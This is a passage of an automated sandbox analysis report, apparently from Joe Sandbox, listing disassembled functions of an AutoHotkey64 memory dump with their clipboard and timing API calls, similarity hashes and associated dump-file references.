Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64
String ID:
API String ID: 3633153638-0
Opcode ID: 560715958e9ad22cff9bd45609a633d546cfc09d1c45cd3a74f70294f1851cde
Instruction ID: b1c7ae8a24810778069fafe1a3c6551f2d9c9bce690edc16e42a87455a890a0f
Opcode Fuzzy Hash: 560715958e9ad22cff9bd45609a633d546cfc09d1c45cd3a74f70294f1851cde
Instruction Fuzzy Hash: 0A91B2B1604A4486F7668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140045913 Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 880b1dff8f4e553541d2c0df82f1ebc126d00dfe579599b08bd480e9fc670724
Instruction ID: 4394bd67c1693840cb74236f192169d336ff9929c8093f819edf5c3ce66602de
Opcode Fuzzy Hash: 880b1dff8f4e553541d2c0df82f1ebc126d00dfe579599b08bd480e9fc670724
Instruction Fuzzy Hash: D791C3B160464486F7668B27E4443E937A1F78DBE4F11022AFB5963BF6DB38C491C705

Function 00000001400439A6 Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f44e48da3a4ef016309810ce71fe0c15323a17a74de66e0742fcb4e04bc019e3
Instruction ID: d52a6a48fe8b1f69d2f633c361f75ca9b127a758eb7ec18129ddcc52a3c250c1
Opcode Fuzzy Hash: f44e48da3a4ef016309810ce71fe0c15323a17a74de66e0742fcb4e04bc019e3
Instruction Fuzzy Hash: D091B3B1604A4486F7668B27E4843E937A1F78DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140043A07 Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 2c38b2394ff07ad6b09adf69979951e184fe247ff7aa0aca12887ef602c37aa7
Instruction ID: 68395de68f15584dda82d4f57cb8725951b19e11d1ed9d3fe99a1cde9902d1fc
Opcode Fuzzy Hash: 2c38b2394ff07ad6b09adf69979951e184fe247ff7aa0aca12887ef602c37aa7
Instruction Fuzzy Hash: 6591A3B160464486F7668B27E4843E937A1F34DBE4F11022AFB5963BF6DB38C494C745

Function 0000000140045ACB Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c6f54e8511f42a2a0e1dbc8550ce043455d927c3a8ff5368ee60a374936b09fc
Instruction ID: 0a36d174e6b84d2d2bfdc6455f051083e43397f8259c8082965f98708c1376c9
Opcode Fuzzy Hash: c6f54e8511f42a2a0e1dbc8550ce043455d927c3a8ff5368ee60a374936b09fc
Instruction Fuzzy Hash: EA91C5B160464486F7668B27E4843E937A1F34DBE4F11022AFB59A7BF6DB38C490C745

Function 0000000140044C6F Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014006BB90: GetKeyboardLayout.USER32 ref: 000000014006BBB8

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalKeyboardLayoutMessagePeekUnlock
String ID:
API String ID: 2243892272-0
Opcode ID: 157350ce186ee7916c2e98032de0ce45d035acded18b6273f6cfff9b7bb1ffa6
Instruction ID: 7a5f0806cf76410240df851954ba170cd30be9f0ce1f27d887bd55dd9ba5ae5c
Opcode Fuzzy Hash: 157350ce186ee7916c2e98032de0ce45d035acded18b6273f6cfff9b7bb1ffa6
Instruction Fuzzy Hash: 0A91A2B1604A4486F7668B27E4843E937A1F38DBE4F11022AFB5963AF6DB38C491C745

Function 0000000140044FBA Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7558bef45f3172f0915147ab9f8f9f7be5cb70ddfa55b07ab712ebb5076c86f2
Instruction ID: a13409067177f67b98d3649f928cc95d36bbf991ca3d655c2c993bcbebb8f817
Opcode Fuzzy Hash: 7558bef45f3172f0915147ab9f8f9f7be5cb70ddfa55b07ab712ebb5076c86f2
Instruction Fuzzy Hash: 1691B2B160464486F7668B27E4843E937A1F38DBE4F11022AFB5963AF6DB38C490C745

Function 0000000140044FE9 Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140073730: SetLastError.KERNEL32 ref: 000000014007379A
Part of subcall function 0000000140073730: DeleteFileW.KERNEL32 ref: 00000001400737A3
Part of subcall function 0000000140073730: GetLastError.KERNEL32 ref: 00000001400737AE

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ErrorLast$ClipboardCloseDeleteFileGlobalMessagePeekUnlock
String ID:
API String ID: 3770565981-0
Opcode ID: 31f85b4aac6b10333885491effea3169971e67ec24347b4816f7e5e158266774
Instruction ID: 1ae04a180cc40b141445f50b4146f0a58f62b4bc88fa94d12a40862e133b32a3
Opcode Fuzzy Hash: 31f85b4aac6b10333885491effea3169971e67ec24347b4816f7e5e158266774
Instruction Fuzzy Hash: 8091A2B160464486F7668B27E4843E937A1F38DBE4F11022AFB5963AF6DB38C494C745

Function 0000000140044FFD Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014008D6A0: GetFullPathNameW.KERNEL32 ref: 000000014008D6D9
Part of subcall function 000000014008D6A0: SHFileOperationW.SHELL32 ref: 000000014008D751

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseFileFullGlobalMessageNameOperationPathPeekUnlock
String ID:
API String ID: 1286959346-0
Opcode ID: eb21326f79f6078596ecb86ad50469d977dd55582c11736912fab9d4fba23c3e
Instruction ID: be6a7ba225e21249ea5b796acc651ceeb27f7d8c14a4208844705fc9753af1d2
Opcode Fuzzy Hash: eb21326f79f6078596ecb86ad50469d977dd55582c11736912fab9d4fba23c3e
Instruction Fuzzy Hash: 8291A2B160464486F7668B27E4843E937A1F38DBE4F11022AFB5963AF6DB38C494C745

Function 0000000140045414 Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014008BD90: CoInitialize.OLE32 ref: 000000014008BE97
Part of subcall function 000000014008BD90: CoCreateInstance.OLE32 ref: 000000014008BEBB

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseCreateGlobalInitializeInstanceMessagePeekUnlock
String ID:
API String ID: 2299052934-0
Opcode ID: 09d2d90fc38a6bc8458c2d10026312a03bdaef46d518cb61a50f7bab1c2c1971
Instruction ID: 68395a548d033bcddbaaff165ad9ea394dcfb0d0c0629e386415acf88649f50c
Opcode Fuzzy Hash: 09d2d90fc38a6bc8458c2d10026312a03bdaef46d518cb61a50f7bab1c2c1971
Instruction Fuzzy Hash: 3591A2B160464486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C494C745

Function 0000000140045492 Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400642E0: SendMessageW.USER32 ref: 0000000140064489

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
String ID:
API String ID: 1853169715-0
Opcode ID: 560a5a05edfec7721c07a655414560f9d4bf56cd4779a6f1985a9a455f843be4
Instruction ID: 7c43371369d7cd13a4310cf8e3f19be408287e3c4da01d2ccfc9c8257571eefd
Opcode Fuzzy Hash: 560a5a05edfec7721c07a655414560f9d4bf56cd4779a6f1985a9a455f843be4
Instruction Fuzzy Hash: 3491C4B160464486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C491C745

Function 000000014004550E Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400642E0: SendMessageW.USER32 ref: 0000000140064489

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
String ID:
API String ID: 1853169715-0
Opcode ID: 6e6469455c0c5482e7af04582cf1ae012445bba39b4e50bf5cfec7036771fa7c
Instruction ID: d22dcbf638ace4e805925e2df6d6c48cc9c6ddc285f23bd4e079839dda57135b
Opcode Fuzzy Hash: 6e6469455c0c5482e7af04582cf1ae012445bba39b4e50bf5cfec7036771fa7c
Instruction Fuzzy Hash: 2191C4B160464486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C491C745

Function 000000014004551D Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400642E0: SendMessageW.USER32 ref: 0000000140064489

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
String ID:
API String ID: 1853169715-0
Opcode ID: 3095ed8a08aea36329e375ab1ce14efb48aa5dd1cbd9bdf28132c5310e9c6ede
Instruction ID: d3b5b453d5814730e71c0b615a575635b6552538aacba1dcabab5306a51f58f7
Opcode Fuzzy Hash: 3095ed8a08aea36329e375ab1ce14efb48aa5dd1cbd9bdf28132c5310e9c6ede
Instruction Fuzzy Hash: C691D4B160464486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C891C705

Function 00000001400439F3 Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9376d31c1b2c4dbb8da401a6eca873ed5b48ffc5bc4a84366a6e434acc93300a
Instruction ID: ce3b815e91545de9e46684aeb17be617597d9a2c472ac032d77be57754533bf4
Opcode Fuzzy Hash: 9376d31c1b2c4dbb8da401a6eca873ed5b48ffc5bc4a84366a6e434acc93300a
